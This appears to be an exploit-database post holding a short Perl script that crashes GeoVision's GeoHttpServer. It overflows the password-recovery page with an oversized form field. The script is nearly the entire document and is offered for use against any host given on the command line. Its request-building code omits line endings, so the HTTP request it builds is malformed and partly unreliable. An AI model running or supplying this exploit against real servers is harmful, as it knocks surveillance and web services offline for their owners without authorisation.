# Exploit Title: GeoHttpServer remote DoS |
# Date: 7-5-2010 |
# Author: aviho1 |
# vendor: GeoVision |
# Version: all |
#info: the password recovery page does not properly validate user-supplied |
password ,causing a dos. |
use IO::Socket; |
|
my $host = shift || 'localhost'; # Target host |
my $port = shift || 80; |
|
my $req = "POST /HintPwd.htm HTTP/1.1"; |
$req .= "Host: $host:$port"; |
$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; |
rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729)"; |
$req .= "Accept: |
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; |
$req .= "Accept-Language: he,en-US;q=0.7,en;q=0.3"; |
$req .= "Accept-Encoding: gzip,deflate"; |
$req .= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7"; |
$req .= "Keep-Alive: 300"; |
$req .= "Connection: keep-alive"; |
$req .= "Referer: http://$host/"; |
$req .= "Content-Type: application/x-www-form-urlencoded"; |
$req .= "Content-Length: 309"; |
$req .= "id=" . "A" x 300 . "&OK=OK"; |
print "\nConnecting to $host on port $port\n"; |
|
my $sock = new IO::Socket::INET( PeerAddr => $host, PeerPort => $port, Proto |
=> 'tcp'); |
$sock or die "Cannot connect to server: $!"; |
print "Sending HTTP request..\n"; |
print $sock $req; |
print "Exploited. Target should be DoSed\n"; |
|
close $sock; |
0 条评论。